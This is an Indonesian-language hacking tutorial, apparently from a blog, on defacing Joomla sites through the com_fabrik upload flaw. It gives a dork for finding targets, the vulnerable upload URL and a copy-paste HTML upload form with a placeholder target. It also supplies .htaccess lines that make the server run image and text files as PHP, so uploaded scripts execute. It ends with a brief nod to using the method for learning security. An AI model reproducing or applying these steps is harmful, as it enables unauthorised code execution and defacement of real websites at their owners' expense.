Com_fabrik adalah salah satu metode lama yang memungkinkan script diunggah ke halaman utama secara instan. Untuk menggunakan metode ini, kamu dapat mencari target dengan menggunakan dork "inurl:/com_fabrik site:gr".
Setelah menemukan target, kamu dapat mencoba untuk melakukan exploit dengan mengakses index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload. Jika berhasil, kamu akan melihat hasil seperti pada gambar.
Selanjutnya, kamu dapat membuat script csrf dengan menyalin kode berikut:
<form method="POST" action="http://webkalian.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file">
<button>Hajarr</button>
</form>
<Font Color="green" Face="courier new"><font size="8">CSRF www.nts-7.net</h1><br><br>
Pastikan untuk mengganti "webkalian.com" dengan target yang telah kamu temukan.
Setelah itu, kamu dapat mengunggah script dengan mengubah ekstensinya menjadi .htm atau .htcsss. Namun, jika ingin menggunakan ekstensi .htaccess, kamu perlu membuat file .htaccess terlebih dahulu dengan isi sebagai berikut:
#Alternate default index page
DirectoryIndex nts7.htm
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
Kamu dapat mengganti nts7.htm dengan nama script yang ingin kamu gunakan. Setelah itu, upload file .htaccess ke target dan klik "hajar". Jika berhasil, kamu akan melihat hasil seperti pada gambar.
Sekarang kamu sudah selesai, dan dapat mengakses indexnya. Ingat, Sebaiknya gunakan pengetahuan ini untuk mempelajari dan meningkatkan keamanan website.
Berkomentar dengan bijak dan sopan adalah salah satu cara agar cepat direspon oleh admin